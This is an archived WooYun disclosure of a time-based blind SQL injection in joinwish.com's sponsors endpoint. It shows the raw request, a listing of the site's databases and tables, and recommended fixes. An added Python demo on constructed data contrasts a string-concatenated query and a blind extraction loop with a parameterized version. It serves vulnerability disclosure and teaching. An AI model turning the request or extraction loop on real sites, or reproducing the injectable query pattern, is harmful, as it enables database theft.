WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2013-08-16: Details reported to the vendor, awaiting the vendor's response
2013-08-19: Vendor confirmed; details disclosed to the vendor only
2013-08-29: Details disclosed to core white hats and relevant domain experts
2013-09-08: Details disclosed to regular white hats
2013-09-18: Details disclosed to intern white hats
2013-09-30: Details disclosed to the public
I heard JoinWish (好愿网) loves giving out gifts, so here I am.
The whole site has basically been made pseudo-static, but with some careful digging you can still find places that take dynamic parameters. Injection point:
GET /wishservice/sponsors?uid=1&wid=10067221&sval=id HTTP/1.1
Referer: http://www.joinwish.com/wish/show/id/10067221
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.joinwish.com
Cookie: PHPSESSID=1km4sivvelstuqmolpqjspjq62
Accept-Encoding: gzip, deflate
Injectable parameter: uid. The database connection runs with DBA privileges; the injection is time-based blind, yet data can still be read out in seconds.
Many other places are injectable as well, with different parameters; please check and fix all of them.
Injectable locations and their parameters:
There are quite a few databases.
Over.
Databases:
available databases [9]:
[*] huluwu
[*] huluwu_dev
[*] information_schema
[*] joinwish_product
[*] joinwish_verify
[*] logs
[*] mysql
[*] performance_schema
[*] test
Tables in the current database, joinwish_product:
Database: joinwish_product
[132 tables]
+------------------------------+
| account_freeze_tx            |
| account_topups               |
| account_transfers            |
| account_tx                   |
| account_withdraws            |
| accounts                     |
| alipay_transfer              |
| alipay_transfer_batch        |
| areas                        |
| auth_group                   |
| auth_group_permissions       |
| auth_permission              |
| auth_user                    |
| auth_user_groups             |
| auth_user_user_permissions   |
| backend_tx                   |
| backends                     |
| bank_cities                  |
| bank_provinces               |
| barcode_types                |
| biz_card_bindings            |
| brands                       |
| c2c_topup_requests           |
| card_items                   |
| cities                       |
| cs_logs                      |
| cs_roles                     |
| cs_user_functions            |
| cs_user_role_functions       |
| cs_user_roles                |
| cs_users                     |
| django_admin_log             |
| django_content_type          |
| django_session               |
| django_site                  |
| errors                       |
| exchanges_users              |
| favorite_wishes              |
| gateway_audit                |
| gateway_audit_result         |
| gateway_order                |
| give_user_brand              |
| hulu_card_no_libs            |
| invitees                     |
| merchants                    |
| mptopup_orders               |
| offline_transfers            |
| p2p_catalogs                 |
| p2p_comment                  |
| p2p_commodities              |
| p2p_exchange_0               |
| p2p_exchange_1               |
| p2p_merchant                 |
| p2p_order                    |
| p2p_send_transaction         |
| p2p_send_withdraw            |
| p2p_settlement_payment_batch |
| p2p_ticket                   |
| p2p_ticket_batch             |
| payment_card_logs            |
| payment_channels             |
| payment_orders               |
| properties                   |
| provinces                    |
| public_utility_orders        |
| refunded_transactions        |
| settlement                   |
| settlement_detail            |
| shopping_items               |
| shopping_orders              |
| terminal_requests            |
| transaction_details          |
| transactions                 |
| tx_types                     |
| user_addresses               |
| user_backends                |
| user_friends                 |
| user_mp_verify_codes         |
| user_reg_requests            |
| user_saved_cards             |
| user_sessions                |
| user_uploaded_pic_catalogs   |
| user_uploaded_pics           |
| user_wish_statistics         |
| users                        |
| weibo_template               |
| wish_albums                  |
| wish_amount_increase_logs    |
| wish_award_logs              |
| wish_base                    |
| wish_cash_coupons            |
| wish_comments                |
| wish_commodities             |
| wish_cs_roles                |
| wish_cs_user_functions       |
| wish_cs_user_role_functions  |
| wish_cs_user_roles           |
| wish_cs_users                |
| wish_details                 |
| wish_exchange_items          |
| wish_exchange_tocheck_users  |
| wish_exchange_view           |
| wish_exchanges               |
| wish_fans                    |
| wish_gifts                   |
| wish_give_logs               |
| wish_give_tx                 |
| wish_guest_infos             |
| wish_hp_use_logs             |
| wish_join_requests           |
| wish_members                 |
| wish_mer_exchange            |
| wish_merchants               |
| wish_msgs                    |
| wish_pdts                    |
| wish_praise_statistical      |
| wish_prop_logs               |
| wish_pub_logs                |
| wish_solutions               |
| wish_themes                  |
| wish_transfers               |
| wish_user_banding            |
| wish_user_guides             |
| wish_user_notification       |
| wish_user_verification       |
| wish_users                   |
| wish_visit_logs              |
| wishes                       |
| withdraw_fee_rate            |
| ym_sms                       |
| ym_sms_mo                    |
| ym_sms_mt                    |
+------------------------------+
0x1: Use prepared statements (parameterized queries), input filtering, and so on.
0x2: The database account's privileges are far too high.
0x3: I am shamelessly asking for a gift.
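The report only names the injectable parameter (uid), the blind technique and the fix; the following is an added example, not code from the report or from joinwish.com, showing both halves: the string-concatenated query that makes uid injectable, the blind inference loop that reads out data through it, and the parameterized version from fix 0x1 that the same loop cannot get through. The schema, rows, table and function names are constructed for illustration (the site's django_* tables suggest Python, hence Python with an in-memory SQLite stand-in). The report used a time-based side channel (a SLEEP() delay on MySQL); SQLite has no sleep function, so the oracle here is "does the uid=1 row still come back", which is the same yes/no inference with a different channel.

```python
import sqlite3

# Added example; schema and rows are constructed, not the target's real data.


def setup_db():
    """Build an in-memory stand-in for the target database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (uid INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret');
        INSERT INTO users VALUES (2, 'bob', 'hunter2');
        CREATE TABLE sponsors (uid INTEGER, wid INTEGER, amount INTEGER);
        INSERT INTO sponsors VALUES (1, 10067221, 50);
        INSERT INTO sponsors VALUES (2, 10067221, 20);
    """)
    return conn


def sponsors_vulnerable(conn, uid):
    """The pattern behind the finding: the request parameter is pasted into
    the SQL text, so whatever arrives in ``uid`` is executed as SQL."""
    sql = "SELECT uid, wid, amount FROM sponsors WHERE uid = " + str(uid)
    return conn.execute(sql).fetchall()


def sponsors_safe(conn, uid):
    """Fix 0x1 from the report: validate the type, then bind the value as a
    query parameter so the database only ever sees it as data."""
    try:
        uid = int(uid)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT uid, wid, amount FROM sponsors WHERE uid = ?", (uid,)
    ).fetchall()


def oracle(lookup, conn, condition):
    """Blind-injection oracle: True when the injected condition holds, i.e.
    the uid=1 row is still returned. A time-based variant would append a
    SLEEP() and measure latency instead of looking at the response body."""
    payload = "1 AND (%s)" % condition
    return len(lookup(conn, payload)) > 0


def extract_blind(lookup, conn, expr, max_len=32):
    """Recover the string produced by SQL expression ``expr`` one character
    at a time with yes/no questions, the loop a blind-injection tool runs.
    hex() of an empty substr is '', so running past the end yields no match."""
    result = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):  # printable ASCII
            cond = "hex(substr((%s), %d, 1)) = '%02X'" % (expr, pos, code)
            if oracle(lookup, conn, cond):
                found = chr(code)
                break
        if found is None:  # past the end of the string
            break
        result += found
    return result


if __name__ == "__main__":
    db = setup_db()
    target = "SELECT password FROM users WHERE name = 'alice'"
    print("vulnerable endpoint leaks:", extract_blind(sponsors_vulnerable, db, target))
    print("parameterized endpoint leaks:", repr(extract_blind(sponsors_safe, db, target)))
```

Run as-is, the loop pulls alice's password out through the concatenated query and gets nothing through the parameterized one; swapping the row-present oracle for a latency measurement is the only change needed to turn it into the time-based extraction the report describes. Note that binding alone does not address fix 0x2: with a DBA-level account, any remaining injection elsewhere on the site still exposes every database listed above, so the application account should be restricted to the joinwish_product tables it actually needs.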
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-08-19 14:44
Fixed; being released today together with the rest.
None yet.